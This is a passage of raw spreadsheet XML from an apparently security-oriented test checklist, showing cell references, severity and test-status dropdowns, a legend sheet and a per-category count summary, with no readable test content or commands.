        <v>1766</v>
      </c>
      <c r="I250" s="21" t="s">
        <v>1767</v>
      </c>
      <c r="J250" s="22" t="s">
        <v>1768</v>
      </c>
      <c r="K250" s="97" t="s">
        <v>70</v>
      </c>
      <c r="L250" s="98" t="s">
        <v>25</v>
      </c>
      <c r="M250" s="94"/>
    </row>
    <row r="251" ht="67.5" customHeight="1">
      <c r="A251" s="25">
        <v>248.0</v>
      </c>
      <c r="B251" s="92" t="s">
        <v>1614</v>
      </c>
      <c r="C251" s="26" t="s">
        <v>1615</v>
      </c>
      <c r="D251" s="27" t="s">
        <v>1769</v>
      </c>
      <c r="E251" s="28" t="s">
        <v>1770</v>
      </c>
      <c r="F251" s="26" t="s">
        <v>1771</v>
      </c>
      <c r="G251" s="29" t="s">
        <v>1772</v>
      </c>
      <c r="H251" s="29" t="s">
        <v>1773</v>
      </c>
      <c r="I251" s="29" t="s">
        <v>1774</v>
      </c>
      <c r="J251" s="30" t="s">
        <v>1775</v>
      </c>
      <c r="K251" s="34" t="s">
        <v>70</v>
      </c>
      <c r="L251" s="31" t="s">
        <v>25</v>
      </c>
      <c r="M251" s="26"/>
    </row>
    <row r="252" ht="67.5" customHeight="1">
      <c r="A252" s="93">
        <v>249.0</v>
      </c>
      <c r="B252" s="92" t="s">
        <v>1614</v>
      </c>
      <c r="C252" s="94" t="s">
        <v>1615</v>
      </c>
      <c r="D252" s="95" t="s">
        <v>1776</v>
      </c>
      <c r="E252" s="96" t="s">
        <v>1777</v>
      </c>
      <c r="F252" s="94" t="s">
        <v>1778</v>
      </c>
      <c r="G252" s="21" t="s">
        <v>1779</v>
      </c>
      <c r="H252" s="21" t="s">
        <v>1780</v>
      </c>
      <c r="I252" s="21" t="s">
        <v>1781</v>
      </c>
      <c r="J252" s="22" t="s">
        <v>1782</v>
      </c>
      <c r="K252" s="97" t="s">
        <v>70</v>
      </c>
      <c r="L252" s="98" t="s">
        <v>25</v>
      </c>
      <c r="M252" s="9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M$252"/>
  <mergeCells count="2">
    <mergeCell ref="A1:M1"/>
    <mergeCell ref="A2:M2"/>
  </mergeCells>
  <dataValidations>
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="L4:L252">
      <formula1>"Critical,High,Medium,Low,Informational"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="K4:K252">
      <formula1>"☐ Not Tested,🔄 In Progress,✅ Pass ,❌ Fail,➖ N/A,⚠️ Needs Review"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5.0"/>
    <col customWidth="1" min="3" max="26" width="8.71"/>
  </cols>
  <sheetData>
    <row r="1" ht="27.75" customHeight="1">
      <c r="A1" s="99" t="s">
        <v>1783</v>
      </c>
      <c r="B1" s="3"/>
    </row>
    <row r="2" ht="18.0" customHeight="1">
      <c r="A2" s="100" t="s">
        <v>1784</v>
      </c>
      <c r="B2" s="100"/>
    </row>
    <row r="3" ht="18.0" customHeight="1">
      <c r="A3" s="101" t="s">
        <v>1785</v>
      </c>
      <c r="B3" s="102" t="s">
        <v>1786</v>
      </c>
    </row>
    <row r="4" ht="18.0" customHeight="1">
      <c r="A4" s="101" t="s">
        <v>1787</v>
      </c>
      <c r="B4" s="102" t="s">
        <v>1788</v>
      </c>
    </row>
    <row r="5" ht="18.0" customHeight="1">
      <c r="A5" s="101" t="s">
        <v>1789</v>
      </c>
      <c r="B5" s="102" t="s">
        <v>1790</v>
      </c>
    </row>
    <row r="6" ht="18.0" customHeight="1">
      <c r="A6" s="101" t="s">
        <v>1791</v>
      </c>
      <c r="B6" s="102" t="s">
        <v>1792</v>
      </c>
    </row>
    <row r="7" ht="18.0" customHeight="1">
      <c r="A7" s="101" t="s">
        <v>1793</v>
      </c>
      <c r="B7" s="102" t="s">
        <v>1794</v>
      </c>
    </row>
    <row r="8" ht="18.0" customHeight="1">
      <c r="A8" s="101" t="s">
        <v>1795</v>
      </c>
      <c r="B8" s="102" t="s">
        <v>1796</v>
      </c>
    </row>
    <row r="9" ht="18.0" customHeight="1">
      <c r="A9" s="101" t="s">
        <v>1797</v>
      </c>
      <c r="B9" s="102" t="s">
        <v>1798</v>
      </c>
    </row>
    <row r="10" ht="18.0" customHeight="1">
      <c r="A10" s="101" t="s">
        <v>1799</v>
      </c>
      <c r="B10" s="102" t="s">
        <v>1800</v>
      </c>
    </row>
    <row r="11" ht="18.0" customHeight="1">
      <c r="A11" s="101" t="s">
        <v>1801</v>
      </c>
      <c r="B11" s="102" t="s">
        <v>1802</v>
      </c>
    </row>
    <row r="12" ht="18.0" customHeight="1">
      <c r="A12" s="101" t="s">
        <v>1803</v>
      </c>
      <c r="B12" s="102" t="s">
        <v>1804</v>
      </c>
    </row>
    <row r="13" ht="18.0" customHeight="1">
      <c r="A13" s="101"/>
      <c r="B13" s="102"/>
    </row>
    <row r="14" ht="18.0" customHeight="1">
      <c r="A14" s="100" t="s">
        <v>1805</v>
      </c>
      <c r="B14" s="100"/>
    </row>
    <row r="15" ht="18.0" customHeight="1">
      <c r="A15" s="101" t="s">
        <v>70</v>
      </c>
      <c r="B15" s="102" t="s">
        <v>1806</v>
      </c>
    </row>
    <row r="16" ht="18.0" customHeight="1">
      <c r="A16" s="101" t="s">
        <v>1807</v>
      </c>
      <c r="B16" s="102" t="s">
        <v>1808</v>
      </c>
    </row>
    <row r="17" ht="18.0" customHeight="1">
      <c r="A17" s="101" t="s">
        <v>1809</v>
      </c>
      <c r="B17" s="102" t="s">
        <v>1810</v>
      </c>
    </row>
    <row r="18" ht="18.0" customHeight="1">
      <c r="A18" s="101" t="s">
        <v>24</v>
      </c>
      <c r="B18" s="102" t="s">
        <v>1811</v>
      </c>
    </row>
    <row r="19" ht="18.0" customHeight="1">
      <c r="A19" s="101" t="s">
        <v>1812</v>
      </c>
      <c r="B19" s="102" t="s">
        <v>1813</v>
      </c>
    </row>
    <row r="20" ht="18.0" customHeight="1">
      <c r="A20" s="101" t="s">
        <v>40</v>
      </c>
      <c r="B20" s="102" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="21" ht="18.0" customHeight="1">
      <c r="A21" s="101"/>
      <c r="B21" s="102"/>
    </row>
    <row r="22" ht="18.0" customHeight="1">
      <c r="A22" s="100" t="s">
        <v>1815</v>
      </c>
      <c r="B22" s="100"/>
    </row>
    <row r="23" ht="18.0" customHeight="1">
      <c r="A23" s="101" t="s">
        <v>1194</v>
      </c>
      <c r="B23" s="102" t="s">
        <v>1816</v>
      </c>
    </row>
    <row r="24" ht="18.0" customHeight="1">
      <c r="A24" s="101" t="s">
        <v>1817</v>
      </c>
      <c r="B24" s="102" t="s">
        <v>1818</v>
      </c>
    </row>
    <row r="25" ht="18.0" customHeight="1">
      <c r="A25" s="101" t="s">
        <v>25</v>
      </c>
      <c r="B25" s="102" t="s">
        <v>1819</v>
      </c>
    </row>
    <row r="26" ht="18.0" customHeight="1">
      <c r="A26" s="101" t="s">
        <v>1820</v>
      </c>
      <c r="B26" s="102" t="s">
        <v>1821</v>
      </c>
    </row>
    <row r="27" ht="18.0" customHeight="1">
      <c r="A27" s="101" t="s">
        <v>1822</v>
      </c>
      <c r="B27" s="102" t="s">
        <v>1823</v>
      </c>
    </row>
    <row r="28" ht="18.0" customHeight="1">
      <c r="A28" s="101"/>
      <c r="B28" s="102"/>
    </row>
    <row r="29" ht="18.0" customHeight="1">
      <c r="A29" s="100" t="s">
        <v>1824</v>
      </c>
      <c r="B29" s="100"/>
    </row>
    <row r="30" ht="18.0" customHeight="1">
      <c r="A30" s="101" t="s">
        <v>1825</v>
      </c>
      <c r="B30" s="102" t="s">
        <v>1826</v>
      </c>
    </row>
    <row r="31" ht="18.0" customHeight="1">
      <c r="A31" s="101" t="s">
        <v>1827</v>
      </c>
      <c r="B31" s="102" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="32" ht="18.0" customHeight="1">
      <c r="A32" s="101" t="s">
        <v>1829</v>
      </c>
      <c r="B32" s="102" t="s">
        <v>1830</v>
      </c>
    </row>
    <row r="33" ht="18.0" customHeight="1">
      <c r="A33" s="101" t="s">
        <v>1831</v>
      </c>
      <c r="B33" s="102" t="s">
        <v>1832</v>
      </c>
    </row>
    <row r="34" ht="18.0" customHeight="1">
      <c r="A34" s="101" t="s">
        <v>1833</v>
      </c>
      <c r="B34" s="102" t="s">
        <v>1834</v>
      </c>
    </row>
    <row r="35" ht="18.0" customHeight="1">
      <c r="A35" s="101" t="s">
        <v>1835</v>
      </c>
      <c r="B35" s="102" t="s">
        <v>1836</v>
      </c>
    </row>
    <row r="36" ht="18.0" customHeight="1">
      <c r="A36" s="101" t="s">
        <v>1837</v>
      </c>
      <c r="B36" s="102" t="s">
        <v>1838</v>
      </c>
    </row>
    <row r="37" ht="18.0" customHeight="1">
      <c r="A37" s="101" t="s">
        <v>1839</v>
      </c>
      <c r="B37" s="102" t="s">
        <v>1840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0.0"/>
    <col customWidth="1" min="3" max="3" width="10.0"/>
    <col customWidth="1" min="4" max="4" width="18.0"/>
    <col customWidth="1" min="5" max="5" width="55.0"/>
    <col customWidth="1" min="6" max="26" width="8.71"/>
  </cols>
  <sheetData>
    <row r="1" ht="27.75" customHeight="1">
      <c r="A1" s="99" t="s">
        <v>1841</v>
      </c>
      <c r="B1" s="2"/>
      <c r="C1" s="2"/>
      <c r="D1" s="2"/>
      <c r="E1" s="3"/>
    </row>
    <row r="2">
      <c r="A2" s="103" t="s">
        <v>1842</v>
      </c>
      <c r="B2" s="103" t="s">
        <v>4</v>
      </c>
      <c r="C2" s="103" t="s">
        <v>1843</v>
      </c>
      <c r="D2" s="103" t="s">
        <v>1844</v>
      </c>
      <c r="E2" s="103" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="3" ht="31.5" customHeight="1">
      <c r="A3" s="6" t="s">
        <v>15</v>
      </c>
      <c r="B3" s="104" t="s">
        <v>16</v>
      </c>
      <c r="C3" s="105">
        <v>40.0</v>
      </c>
      <c r="D3" s="104" t="s">
        <v>1845</v>
      </c>
      <c r="E3" s="104" t="s">
        <v>1846</v>
      </c>
    </row>
    <row r="4" ht="31.5" customHeight="1">
      <c r="A4" s="106" t="s">
        <v>302</v>
      </c>
      <c r="B4" s="104" t="s">
        <v>303</v>
      </c>
      <c r="C4" s="105">
        <v>16.0</v>
      </c>
      <c r="D4" s="104" t="s">
        <v>1847</v>
      </c>
      <c r="E4" s="104" t="s">
        <v>1848</v>
      </c>
    </row>
    <row r="5" ht="31.5" customHeight="1">
      <c r="A5" s="12" t="s">
        <v>416</v>
      </c>
      <c r="B5" s="104" t="s">
        <v>417</v>
      </c>
      <c r="C5" s="105">
        <v>6.0</v>
      </c>
      <c r="D5" s="104" t="s">
        <v>1849</v>
      </c>
      <c r="E5" s="104" t="s">
        <v>1850</v>
      </c>
    </row>
    <row r="6" ht="31.5" customHeight="1">
      <c r="A6" s="15" t="s">
        <v>460</v>
      </c>
      <c r="B6" s="104" t="s">
        <v>461</v>
      </c>
      <c r="C6" s="105">
        <v>32.0</v>
      </c>
      <c r="D6" s="104" t="s">
        <v>1851</v>
      </c>
      <c r="E6" s="104" t="s">
        <v>1852</v>
      </c>
    </row>
    <row r="7" ht="31.5" customHeight="1">
      <c r="A7" s="107" t="s">
        <v>686</v>
      </c>
      <c r="B7" s="104" t="s">
        <v>687</v>
      </c>
      <c r="C7" s="105">
        <v>37.0</v>
      </c>
      <c r="D7" s="104" t="s">
        <v>1853</v>
      </c>
      <c r="E7" s="104" t="s">
        <v>1854</v>
      </c>
    </row>
    <row r="8" ht="31.5" customHeight="1">
      <c r="A8" s="108" t="s">
        <v>947</v>
      </c>
      <c r="B8" s="104" t="s">
        <v>948</v>
      </c>
      <c r="C8" s="105">
        <v>39.0</v>
      </c>
      <c r="D8" s="104" t="s">
        <v>1855</v>
      </c>
      <c r="E8" s="104" t="s">
        <v>1856</v>
      </c>
    </row>
    <row r="9" ht="31.5" customHeight="1">
      <c r="A9" s="109" t="s">
        <v>1223</v>
      </c>
      <c r="B9" s="104" t="s">
        <v>1224</v>
      </c>
      <c r="C9" s="105">
        <v>36.0</v>
      </c>
      <c r="D9" s="104" t="s">
        <v>1857</v>
      </c>
      <c r="E9" s="104" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="10" ht="31.5" customHeight="1">
      <c r="A10" s="7" t="s">
        <v>1477</v>
      </c>
      <c r="B10" s="104" t="s">
        <v>1478</v>
      </c>
      <c r="C10" s="105">
        <v>14.0</v>
      </c>
      <c r="D10" s="104" t="s">
        <v>1859</v>
      </c>
      <c r="E10" s="104" t="s">
        <v>1860</v>
      </c>
    </row>
    <row r="11" ht="31.5" customHeight="1">
      <c r="A11" s="8" t="s">
        <v>1577</v>
      </c>
      <c r="B11" s="104" t="s">
        <v>1861</v>
      </c>
      <c r="C11" s="105">
        <v>5.0</v>
      </c>
      <c r="D11" s="104" t="s">
        <v>1862</v>
      </c>
      <c r="E11" s="104" t="s">
        <v>1863</v>
      </c>
    </row>
    <row r="12" ht="31.5" customHeight="1">
      <c r="A12" s="110" t="s">
        <v>1614</v>
      </c>
      <c r="B12" s="104" t="s">
        <v>1615</v>
      </c>
      <c r="C12" s="105">
        <v>24.0</v>
      </c>
      <c r="D12" s="104" t="s">
        <v>1864</v>
      </c>
      <c r="E12" s="104" t="s">
        <v>1865</v>
      </c>
    </row>
    <row r="13" ht="21.75" customHeight="1">
      <c r="A13" s="111" t="s">
        <v>1866</v>
      </c>
      <c r="B13" s="112"/>
      <c r="C13" s="111">
        <v>249.0</v>
      </c>
      <c r="D13" s="112"/>
      <c r="E13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2026-03-12T05:49:37Z</dcterms:created>
  <dc:creator>openpyxl</dc:creator>
</cp:coreProperties>
</file>